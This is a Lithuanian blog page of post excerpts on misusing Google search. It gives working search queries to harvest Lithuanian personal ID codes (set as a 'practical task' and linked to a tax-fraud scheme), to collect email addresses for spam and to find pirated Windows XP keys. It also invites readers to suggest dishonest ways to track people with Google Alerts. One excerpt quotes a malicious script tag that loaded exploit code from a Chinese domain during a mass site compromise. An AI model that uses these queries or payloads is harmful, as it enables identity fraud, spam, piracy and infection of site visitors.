Šis įrašas bus neįprastai trumpas. Prieš tai rašiau, kaip asmeninius duomenis galima susirankioti su Google. Pati paieškos sistema nėra pajėgi viską tinkamai sukontroliuoti ir tuos duomenis laiku pašalinti iš rezultatų, dėl to Google siūlo galimybę patiems stebėti ką ir kada naujo ji suranda. Tam skirta tarnyba Google Alerts, kurią rasite adresu http://www.google.com/alerts. Tiesiog nurodykite norimą stebėti tekstą (pvz. savo vardą ir pavardę) bei el. paštą ir juo gausite pranešimus iš karto, kai tik Google kur nors suras tai, ką nurodėte. O kai ras, tuomet pasinaudodami šia instrukcija, galite prašyti pašalinti nepageidaujamus rezultatus.

Tokiu pačiu būdu galite stebėti naujai pasirodančius pranešimus apie mėgstamą sproto komandą, aktorių, kaimyną ar bet ką kitą. Taip, Google jums padeda tapti sekliu ir stebėti ne tik kieno nors spaudos pranešimus, bet ir kitus asmenis. Kaip manot, gerai tai ar blogai? Ar šią paslaugą galima išnaudoti kokiai nors nesąžiningai veiklai? Kaip tai galima padaryti? Siūlykit savo galimus variantus komentaruose. Diskutuosim, nagrinėsim ir kelsim naujas idėjas. Pažiūrėsim ką naujo bendrai visi sugalvosim.

Na rodos pagaliau baigiau visas savo vasaros atostogas. Viskas buvo gerai, kol neprireikė skristi atgal FlyLAL’u. Išskridau beveik 5 valandom vėliau nei turėjau (visą tą laiką teko praleisti oro uoste), leidomės Kaune, važiavom iki Vilniaus autobusu, o bagažas nuskrido kitu lėktuvu ir atsirado tik kitą dieną po pietų. Vietoj planuotų 7 valandų kelionės namo, ji užtruko visas 14 ir namie buvau tik 5:00, dėl ko sėkmingai buvo iki galo sufakapinta ir visa pirmadieninė darbo diena. Oro uoste priežasčių tiksliai paaiškinti negalėjo, bet kažkodėl vietoj vieno didelio lėktuvo atskrido du maži. Žinoma, FlyLAL’as elgėsi lietuviškai. Neišstenėjo net ir kriu kriu, nors ir buvo didelė didelė kiaulė (tokia rožinė, boingo dydžio). Dabar “džiaugiuosi” galėdamas dirbti visą savaitę po 12 valandų per dieną už praleistą pirmadienį (planas buvo po 10). Šiandien vakarop (naktį?) jau sugebėjau žvilgtelėti ir kas čia įdomaus aplinkui vyksta. Užkliuvo mokyklų elektroninio dienyno istorija. Šiaip viskas įvykdyta pakankamai neetiškai, nes pažeidžiamumas su detaliomis instrukcijomis paskelbtas viešai prieš tai neinformavus sistemos kūrėjų ir jo nepašalinus. Viso pažeidžiamumo akcentas buvo ne galimybė moksleiviams pasiredaguoti pažymius ar pastabas, bet galimybė pavogti asmeninius duomenis. Tad šį kartą norėčiau grįžti prie šios temos ir eilinį kartą panagrinėti tuos atvejus, kai asmeniniai duomenys paviešinami dėl žmonių, o ne sistemų klaidų. Beveik prieš metus rašiau apie būdą, kaip Google pagalba internete ieškoti asmens kodų.

Skaityti visą įrašą…

Pastaruoju metu internete įvyksta vis daugiau automatizuotų tinklalapių nulaužimų. Laužiama iš karto dideliais kiekiais. Pvz. po 10 000 vnt. iš karto. Ir nesirenkama kas laužiamas. Svarbu didelis kiekis išnaudojant tam tikrus šabloninius tinklalapių pažeidžiamumus. Atakos metu į tinklalapius įterpiamas papildomas kodas. T.y. puslapis šiek tiek patiuninguojamas. Tas tiuningas, tai yra JavaScript’as, kuris tinklalapio lankytojų sistemose ieško pažeidžiamumų ir tuos pažeidžiamumus bando išnaudoti. Pvz. jei turit neatnaujintą kokį nors Adobe Reader’į, seną QuickTime grotuvą ar Flash’o versiją, tai po apsilankymo tokiam nulaužtam puslapyje, kompiuteryje dar turėsit ir kokią nors papildomą žalingą programą. O Jūsų nuomonės apie tai niekas net ir neklaus. Po visų tokių masinių atakų, pažeisti puslapiai turėdavo žalingą kodą su Šanchajuje ar kur nors kitur Kinijoje registruotais domenais. Paskutinė ataka vyko balandžio mėn. ir į puslapius pridėdavo štai tokį kodą: <script src=http://www.nihaorr1.com/1.js></script>. Kiek iš skaitančių šį tinklaraštį nukentėjo nuo šios atakos? O kiek apie nukentėjusias įmones parašė spauda? Be problemų galim įvertinti kaipgi sekėsi lietuviškiems tinklalapiams. Aišku, kaip gi čia be google’o.

Skaityti visą įrašą…

Kiek daugiau nei prieš savaitę Antanas su manimi pasidalino savo radiniu internete. Jei tau nuo nešiojamo kompo dugno nusitrynė, tu jį pametei arba tiesiog niekada neturėjai Windows XP registracijos numerio, tai diegiant šią sistemą tokį numerį gauti nėra problema. Ne, nereikia jokių specializuotų paieškos sistemų, tokių kaip astalavista.box.sk ir nereikia žinoti visokių slaptų viečikių internete, nes tą darbą gali padaryti Google. Tiesiog įvykdyk paiešką su tokiais duomenimis:“Windows XP Professional” “Belarc Advisor Current Profile” key: Ar jau radai tinkamą raktą savo piratinei windozės versijai?

Google. Senai apie jį rašiau. Daugelis turbūt naudojatės paprasčiausia paieška be jokių specialių operatorių. O jų Google turi nemažai ir naudojantis jais galima visai neblogai “patobulinti” paiėšką. Pvz. operatorius “intitle:”. Jei paieškoje panaudosi tokį operatorių, tai paieškos rezultatas bus puslapiai, kurių pavadinime yra nurodytas žodis. Dedu iliustracijas su pavyzdžiu.

Skaityti visą įrašą…

Ok, kadangi mano paskutinį post’ą sudirbote kaip “dar vieną apie kurį rašė kiti”, tai dabar parašysiu tokį, kokio tikiuosi dar nerašė niekas apie google ir “nestandartinį” jo panaudojimą. Kaip spam’eriai surenka el. pašto adresus turbūt žinote. Jie sukuria spec. programą, taip vadinamą vorą, kuris vaikšto po tinklalapius ir ieško juose el. pašto adresų. Žodžiu, jei palikai kur nors savo email’ą, tai lauk spam’o. Bet kam vargti su tai robotais-voriukais jeigu yra google? Nors ši paieškos sistema ir naudoja filtrus, neleidžiančius ieškoti el. pašto adresų, tačiau juos nesunku apeiti. Pvz., norint gauti one.lt el. pašto adresus, į paieškos laukelį tereikia įrašyti +*@one.lt. Pakaktų ir tiesiog *@one.lt, tačiau pirmuoju variantu kiek tikslesni rezultatai gaunasi. Ir štai ką gaunam:

Skaityti visą įrašą…

Šiandien Verslo Žiniose perskaičiau apie tai, kaip vieno viešbučio darbuotojai vogė savo klientų duomenis ir už juos pateikinėjo deklaracijas į VMI ir tokiu būdu bandė pasisavinti 2% pajamų mokesčio. Apie tai kiek plačiau yra parašyta ir čia: http://www.lrytas.lt/?data=20070829&id=akt29_a3070829&sk_id=99&view=2 Prasisukti bandė gudriai, bet norint gauti asmens duomenis, nereikia būti viešbučio darbuotoju. Tam pakanka gūglo. Taigi, pirmoji paprasta praktinė šio BLOG’o užduotis (pradėsim nuo paprastų dalykų). Gūglas nuostabus tuo, kad suranda viską, kas ne vietoje guli.  Asmens kodo paieška internete. Tiesiog paieškos langelyje įrašykite raides ak ir trijų skaitmenų skaičių, prasidedantį 3 arba 4. Pažymėkite paiešką tik puslapiuose iš Lietuvos. Pvz. ak 377. Štai ką parodys gūglas:

arba kitas variantas

Merų, atsakingų asmenų, vadovų ir kitų darbingų žmonių asmens kodai. Pirmu atveju gauti maždaug 676 rezultatai, antruoju net 9120. Žinoma, didžioji tų rezultatų dalis neturės asmens kodų, bet pakaktų bent 10% tinkamų paieškos rezultatų, kad pagal Lietuvos Ryte aprašytą scenarijų būtų galima prasisukti su deklaracijomis.

Geros paieškos